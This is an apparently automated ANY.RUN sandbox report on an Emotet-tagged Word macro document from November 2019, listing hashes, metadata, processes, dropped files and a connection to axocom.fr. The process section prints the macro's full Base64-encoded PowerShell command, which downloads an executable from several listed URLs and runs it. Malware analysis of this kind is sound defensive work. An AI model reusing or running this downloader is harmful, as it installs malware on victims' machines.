analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

m14dn34ak4yhugxc6utt74rb

Full analysis: https://app.any.run/tasks/33c094f5-aa5f-4a31-bcfe-7354571d0a98
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2019, 14:56:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Excepturi aliquam commodi., Author: Pavol Kolr, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 07:13:00 2019, Last Saved Time/Date: Thu Nov 7 07:13:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5:

8E733951981CCA9A6E56B0C3D83605A6

SHA1:

81D5062725FEB14DD74C71B0C765F9C2275B0267

SHA256:

1D6BD22C491DB2F0407963456128A1E202D7E4198715B172FDFAA7565F186497

SSDEEP:

3072:JAg1Kx+H+UaqFh51r/SzFaSafGBrjC48+WZ/POhh+/BqtKVGpGJ1x8Yxy:JFHNaqjSzGfD48+aPOnqqtGKGJ1qY0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2716)
    • Creates files in the user directory

      • powershell.exe (PID: 2716)
    • PowerShell script executed

      • powershell.exe (PID: 2716)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 496)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 197
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 169
Words: 29
Pages: 1
ModifyDate: 2019:11:07 07:13:00
CreateDate: 2019:11:07 07:13:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Pavol Kolár
Subject: -
Title: Excepturi aliquam commodi.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
496"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\m14dn34ak4yhugxc6utt74rb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2716powershell -enco JABWAGIAbABtAG0AYgB4AGUAZAB1AGoAPQAnAFkAeQBvAHcAcABpAHMAYQBrAHgAcwBqAHgAJwA7ACQAUwBjAHcAaABvAGcAawBoAHoAZwBwACAAPQAgACcAMgAwACcAOwAkAEsAZwBrAHEAZwBuAGwAYwB5AHEAcgBmAD0AJwBJAG4AaQByAGkAbQBzAGQAcgBoAHAAJwA7ACQAWQB4AGoAbgBuAGsAYwB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAGMAdwBoAG8AZwBrAGgAegBnAHAAKwAnAC4AZQB4AGUAJwA7ACQARQB0AGQAbwBiAHgAbQB0AG8AeQA9ACcASwBtAG0AeAB5AHEAbgBwAHcAbwBlACcAOwAkAEoAZwB6AHIAZABoAHoAYgB6AGQAeQBpAGkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAQwBsAGkARQBuAHQAOwAkAEgAagB3AHQAaABsAGIAZwBzAGIAdgA9ACcAaAB0AHQAcABzADoALwAvAGEAeABvAGMAbwBtAC4AZgByAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AZAAwADEALwAqAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGkAbgBuAG8AdgBhAGMAYwBlAHIALgBjAG8AbQAvAHAAaABxAGcALwBhAE0ALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBlAHgAaQBtAGEAbABlAHIAdAAuAGMAbwBtAC8AZABoAHgAcQAvAFgAdwBlAHUAWgBEAC8AKgBoAHQAdABwAHMAOgAvAC8AaQB0AGIAegAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbwBkAHIAaAB2AC8AKgBoAHQAdABwAHMAOgAvAC8AbwByAGMAaABhAHMAawBpAGQAZABpAGUAcwB3AG8AcgBsAGQALgBjAG8AbQAvAHQAMgA0AGQAZgBoAC8AZQBhAC8AJwAuACIAcwBgAHAAbABpAHQAIgAoACcAKgAnACkAOwAkAFIAbwBhAGcAbwBkAGEAcABkAD0AJwBVAGIAcQBoAHkAdgB1AG8AYgBiACcAOwBmAG8AcgBlAGEAYwBoACgAJABBAG8AcQBtAGcAawBhAGsAIABpAG4AIAAkAEgAagB3AHQAaABsAGIAZwBzAGIAdgApAHsAdAByAHkAewAkAEoAZwB6AHIAZABoAHoAYgB6AGQAeQBpAGkALgAiAGQAbwB3AE4AYABsAG8AQQBgAEQARgBpAEwARQAiACgAJABBAG8AcQBtAGcAawBhAGsALAAgACQAWQB4AGoAbgBuAGsAYwB0ACkAOwAkAEcAZgBzAHIAYwBiAG8AcQBvAGQAaQBqAGoAPQAnAFoAdgBnAGEAaABmAGQAZAB4AGEAZgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFkAeABqAG4AbgBrAGMAdAApAC4AIgBMAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADMAMgA3ADUANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABZAHgAagBuAG4AawBjAHQAKQA7ACQAUQB5AGUAdABvAHQAYQB3AGwAeQBvAG8APQAnAFIAdABnAHkAbQBpAHYAdAB1AGIAcQB0ACcAOwBiAHIAZQBhAGsAOwAkAFYAcQB3AGsAbgB2AHgAZQA9ACcAVQByAG0AYwBqAGkAbABzAHAAaQBsACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAZABzAHkAdwBlAGMAZAB2AHEAeABiAD0AJwBFAGIAdQB4AG4AbwBxAGUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 057
Read events
1 205
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
8

Dropped files

PID
Process
Filename
Type
496WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA775.tmp.cvr
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAF9B13B.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C889A01.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA65380E.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82206F4C.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6669EEDD.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C93781F3.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6536B58.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8AFEE326.wmf
MD5:
SHA256:
496WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC28ACEF.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2716
powershell.exe
116.203.228.95:443
axocom.fr
334,Udyog Vihar
IN
unknown

DNS requests

Domain
IP
Reputation
axocom.fr
  • 116.203.228.95
unknown

Threats

No threats detected
No debug info